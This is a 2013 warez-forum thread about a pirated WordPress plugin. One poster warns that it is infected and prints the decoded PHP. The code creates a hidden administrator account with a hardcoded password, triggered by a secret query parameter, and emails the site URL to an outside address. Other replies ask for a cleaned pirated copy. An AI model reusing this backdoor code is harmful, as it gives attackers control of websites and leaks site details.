[GET] WP Clicks 1.3.3 Nulled

***fatfox*** · 03-21-2013, 01:06 PM

(03-20-2013 11:07 AM)master88 Wrote: DO NOT INSTALL. This file is INFECTED!! Once installed, it is creating a backdoor and sending email to thomasza@gmx.com

BEWARE!!!

which is the same hijacking found on the WP SEO here:
/Thread-GET-SEOPressor-UNLIMITED-nulled-V-4-3-11-Latest-Updates

I got the code below after I decode the wpclicks.php

PHP Code:

<?phpadd_action('wp_head', 'bvg4jukan');function bvg4jukan(){If ($_GET['cms'] == 'jjoplmh') {require('wp-includes/registration.php');If (!username_exists('wordpress')) {$user_id = wp_create_user('wordpress','gh67io9Cjm');$user = new WP_User($user_id);$user->set_role('administrator');}}}add_action('wp_head', 'vfbg2awsc');function vfbg2awsc(){If (!username_exists('wordpress')){$addressdecode='thomasza@gmx.com';$vari='Wordpress Plugin WpClick';mail($addressdecode,get_bloginfo('wpurl'),$vari);}}?>

I think you know what it means.

***incomsis*** · (This post was last modified: 03-22-2013 09:45 AM by incomsis.)

(03-20-2013 11:07 AM)master88 Wrote: DO NOT INSTALL. This file is INFECTED!! Once installed, it is creating a backdoor and sending email to thomasza@gmx.com

BEWARE!!!

which is the same hijacking found on the WP SEO here:
/Thread-GET-SEOPressor-UNLIMITED-nulled-V-4-3-11-Latest-Updates

Can this be cleaned? Thanks for letting us know.

***master88*** · 03-23-2013, 10:27 AM

It probably can but I couldn't even get the 1.3 version from Chairman to record on my WP.

***incomsis*** · 03-25-2013, 05:45 AM

(03-23-2013 10:27 AM)master88 Wrote: It probably can but I couldn't even get the 1.3 version from Chairman to record on my WP.

Hm, the one I shared was recording everything on my WP, I even posted screenshots from it. Could you try to clean it, please?

Thanks in advance!

***master88*** · 03-30-2013, 04:07 PM

If someone can post the decoded file, I will look into it and see if I can clean it.

(03-25-2013 05:45 AM)incomsis Wrote:
(03-23-2013 10:27 AM)master88 Wrote: It probably can but I couldn't even get the 1.3 version from Chairman to record on my WP.
Hm, the one I shared was recording everything on my WP, I even posted screenshots from it. Could you try to clean it, please?

Thanks in advance!

***grafx77*** · 04-02-2013, 08:57 PM

Waiting for clean version please.......

***doddy*** · 05-02-2013, 02:40 PM

Any clean version guys/gals?

***CharlieCracker*** · 06-06-2013, 04:57 PM

(03-21-2013 01:06 PM)fatfox Wrote:
(03-20-2013 11:07 AM)master88 Wrote: DO NOT INSTALL. This file is INFECTED!! Once installed, it is creating a backdoor and sending email to thomasza@gmx.com

BEWARE!!!

which is the same hijacking found on the WP SEO here:
/Thread-GET-SEOPressor-UNLIMITED-nulled-V-4-3-11-Latest-Updates
I got the code below after I decode the wpclicks.php

PHP Code:

set_role('administrator');}}}add_action('wp_head', 'vfbg2awsc');function vfbg2awsc(){If (!username_exists('wordpress')){$addressdecode='thomasza@gmx.com';$vari='Wordpress Plugin WpClick';mail($addressdecode,get_bloginfo('wpurl'),$vari);}}?>

I think you know what it means.

Can Someone PM me the full Decoded wpclick.php please. I'll try to clean it :)

***tono4850*** · 06-30-2013, 05:52 PM

unfortunately doesnt work on 000webhost

***nilshinde*** · 10-07-2013, 05:24 AM

What's the password for the zip file?